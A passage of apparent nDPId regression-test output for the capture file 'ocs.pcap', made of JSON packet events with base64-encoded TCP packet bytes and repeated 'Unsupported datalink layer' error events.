-00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":806,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMORQABABn9EwKi0ArL40DbC2QBQ64tGkd7033PQEC\/qCMoAAAEBCAoANZUcRwYquQEBBRLe9O+33vT6j9705N\/e9OpL"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":807,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652834052} -00359{"packet_event_id":1,"packet_event_name":"packet","packet_id":807,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":80,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":80,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAUMOSQABABn87wKi0ArL40DbC2QBQ64tGkd7033PwEC\/qOxcAAAEBCAoANZUhRwYquQEBBRre9PUj3vT6j97077fe9PqP3vTk39706ks="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":808,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652834446} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":808,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOTQABABn9KwKi0ArL40DbC2QBQ64tGkd706kuwEC\/BqqUAAAEBCAoANZVJRwYrJwEBBQre9O+33vT6jw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":809,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652834534} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":809,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMOUQABABn9BwKi0ArL40DbC2QBQ64tGkd706kvQEC\/BvGcAAAEBCAoANZVRRwYrJwEBBRLe9QVn3vUK097077fe9PqP"} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":810,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652834958} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":810,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOVQABABn9IwKi0ArL40DbC2QBQ64tGkd70+o+wEC\/Bc7AAAAEBCAoANZV8RwYrsQEBBQre9QVn3vUK0w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":811,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652834985} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":811,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOWQABABn9HwKi0ArL40DbC2QBQ64tGkd70+o+wEC\/Wbi0AAAEBCAoANZV+RwYrsQEBBQre9QVn3vUQPw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":812,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652834986} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":812,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOXQABABn9GwKi0ArL40DbC2QBQ64tGkd70+o+wEC\/WaMAAAAEBCAoANZV\/RwYrsQEBBQre9QVn3vUVqw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":813,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835015} 
-00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":813,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOYQABABn9FwKi0ArL40DbC2QBQ64tGkd70\/\/uwEC\/BY0AAAAEBCAoANZWBRwYr2AEBBQre9QVn3vUVqw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":814,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835017} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":814,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOZQABABn9QwKi0ArL40DbC2QBQ64tGkd71FauAEC+sXLoAAAEBCAoANZWBRwYr2A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":815,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835017} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":815,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOaQABABn9DwKi0ArL40DbC2QBQ64tGkd71FauwEC+sQs0AAAEBCAoANZWBRwYr2AEBBQre9RA\/3vUVqw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":816,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835017} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":816,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMObQABABn9OwKi0ArL40DbC2QBQ64tGkd71GxeAEC+XV2IAAAEBCAoANZWCRwYr2A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":817,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835040} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":817,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOcQABABn9NwKi0ArL40DbC2QBQ64tGkd71IIOAEC\/qUZkAAAEBCAoANZWERwYr4A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":818,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835042} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":818,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOdQABABn9MwKi0ArL40DbC2QBQ64tGkd71Je+AEC\/WTEEAAAEBCAoANZWERwYr4A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":819,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835045} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":819,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOeQABABn9LwKi0ArL40DbC2QBQ64tGkd71K1uAEC\/BRugAAAEBCAoANZWFRwYr4Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":820,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835064} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":820,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOfQABABn9KwKi0ArL40DbC2QBQ64tGkd71MMeAEC\/qQU0AAAEBCAoANZWHRwYr5Q=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":821,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835066} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":821,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOgQABABn9JwKi0ArL40DbC2QBQ64tGkd71NjOAEC\/qO+AAAAEBCAoANZWHRwYr5g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":822,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835069} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":822,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOhQABABn9IwKi0ArL40DbC2QBQ64tGkd71O5+AEC\/qNnMAAAEBCAoANZWHRwYr5w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":823,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835091} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":823,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOiQABABn9HwKi0ArL40DbC2QBQ64tGkd71QQuAEC\/qMQAAAAEBCAoANZWJRwYr7A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":824,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835093} 
-00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":824,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOjQABABn9GwKi0ArL40DbC2QBQ64tGkd71RneAEC\/qK5QAAAEBCAoANZWJRwYr7A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":825,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835095} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":825,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOkQABABn9FwKi0ArL40DbC2QBQ64tGkd71S+OAEC\/WJjsAAAEBCAoANZWKRwYr7A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":826,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835097} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":826,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOlQABABn9EwKi0ArL40DbC2QBQ64tGkd71UU+AEC\/BIOMAAAEBCAoANZWKRwYr7Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":827,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835117} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":827,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOmQABABn9DwKi0ArL40DbC2QBQ64tGkd71VruAEC\/qG0cAAAEBCAoANZWMRwYr8g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":828,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835118} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":828,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOnQABABn9CwKi0ArL40DbC2QBQ64tGkd71XCeAEC\/WFe4AAAEBCAoANZWMRwYr8w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":829,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835122} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":829,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOoQABABn9BwKi0ArL40DbC2QBQ64tGkd71YZOAEC\/BEJcAAAEBCAoANZWMRwYr8w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":830,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835123} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":830,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOpQABABn9AwKi0ArL40DbC2QBQ64tGkd71Zv+AEC+sCz8AAAEBCAoANZWMRwYr9A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":831,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835149} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":831,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOqQABABn8\/wKi0ArL40DbC2QBQ64tGkd71cdeAEC\/qACYAAAEBCAoANZWPRwYr9A=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":832,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835154} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":832,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOrQABABn8+wKi0ArL40DbC2QBQ64tGkd71fK+AEC\/q9UYAAAEBCAoANZWQRwYr+g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":833,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835194} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":833,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOsQABABn89wKi0ArL40DbC2QBQ64tGkd71ghuAEC\/q79UAAAEBCAoANZWURwYr+w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":834,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835242} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":834,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOtQABABn8wwKi0ArL40DbC2QBQ64tGkd71ghuwEC\/qxssAAAEBCAoANZWYRwYr+wEBBQre9ZfL3vWdNw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":835,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835279} 
-00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":835,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOuQABABn8vwKi0ArL40DbC2QBQ64tGkd71h4ewEC\/qwT4AAAEBCAoANZWcRwYsGAEBBQre9ZfL3vWdNw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":836,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835337} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":836,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOvQABABn8uwKi0ArL40DbC2QBQ64tGkd71jPOwEC\/qu8IAAAEBCAoANZWiRwYsIgEBBQre9ZfL3vWdNw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":837,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836187} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":837,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOwQABABn8twKi0ArL40DbC2QBQ64tGkd71kl+wEC\/qtTMAAAEBCAoANZX3RwYs8AEBBQre9ZfL3vWdNw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":838,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836225} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":838,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMOxQABABn8kwKi0ArL40DbC2QBQ64tGkd71kl\/QEC\/qjIAAAAEBCAoANZX7RwYs8AEBBRLe9aKj3vWoD971l8ve9Z03"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":839,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836225} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":839,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMOyQABABn8jwKi0ArL40DbC2QBQ64tGkd71kl\/QEC\/qhxQAAAEBCAoANZX7RwYs8AEBBRLe9aKj3vWte971l8ve9Z03"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":840,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836296} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":840,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOzQABABn8qwKi0ArL40DbC2QBQ64tGkd71nTewEC\/Bjz8AAAEBCAoANZYCRwYtDgEBBQre9aKj3vWtew=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":841,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836296} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":841,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMO0QABABn8hwKi0ArL40DbC2QBQ64tGkd71nTfQEC\/BW7gAAAEBCAoANZYCRwYtDgEBBRLe9agP3vWte971oqPe9a17"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":842,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836298} 
-00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":842,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMO1QABABn8owKi0ArL40DbC2QBQ64tGkd71nTewEC\/BidMAAAEBCAoANZYCRwYtDgEBBQre9aKj3vWy5w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":843,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836348} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":843,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMO2QABABn8nwKi0ArL40DbC2QBQ64tGkd71nTewEC\/BhGIAAAEBCAoANZYHRwYtDgEBBQre9aKj3vW4Uw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":844,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836350} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":844,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMO3QABABn8mwKi0ArL40DbC2QBQ64tGkd71nTewEC\/BfvYAAAEBCAoANZYHRwYtDgEBBQre9aKj3vW9vw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":845,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836356} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":845,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMO4QABABn8lwKi0ArL40DbC2QBQ64tGkd71nTewEC\/BeYkAAAEBCAoANZYIRwYtDgEBBQre9aKj3vXDKw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":846,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836418} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":846,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMO5QABABn8kwKi0ArL40DbC2QBQ64tGkd71nTewEC\/BdBcAAAEBCAoANZYORwYtDgEBBQre9aKj3vXIlw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":847,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836488} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":847,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMO6QABABn8bwKi0ArL40DbC2QBQ64tGkd71nTfQEC\/B6cgAAAEBCAoANZYVRwYtDgEBBRLe9dNv3vXY2971oqPe9ciX"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":848,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836587} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":848,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMO7QABABn8awKi0ArL40DbC2QBQ64tGkd71nTfQEC\/B5FIAAAEBCAoANZYfRwYtDgEBBRLe9dNv3vXeR971oqPe9ciX"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":849,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652837211} 
-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":849,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMO8QABABn8hwKi0ArL40DbC2QBQ64tGkd71yJewEC9CAZMAAAEBCAoANZZdRwYt5gEBBQre9dNv3vXeRw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":850,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652837242} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":850,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMO9QABABn8gwKi0ArL40DbC2QBQ64tGkd71yJewEC+B++QAAAEBCAoANZZgRwYt5gEBBQre9dNv3vXjsw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":851,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652837244} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":851,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMO+QABABn8fwKi0ArL40DbC2QBQ64tGkd71yJewEC+B9ncAAAEBCAoANZZhRwYt5gEBBQre9dNv3vXpHw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":852,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652837322} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":852,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMO\/QABABn8ewKi0ArL40DbC2QBQ64tGkd71zgOwEC+s8LMAAAEBCAoANZZoRwYuDAEBBQre9dNv3vXpHw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
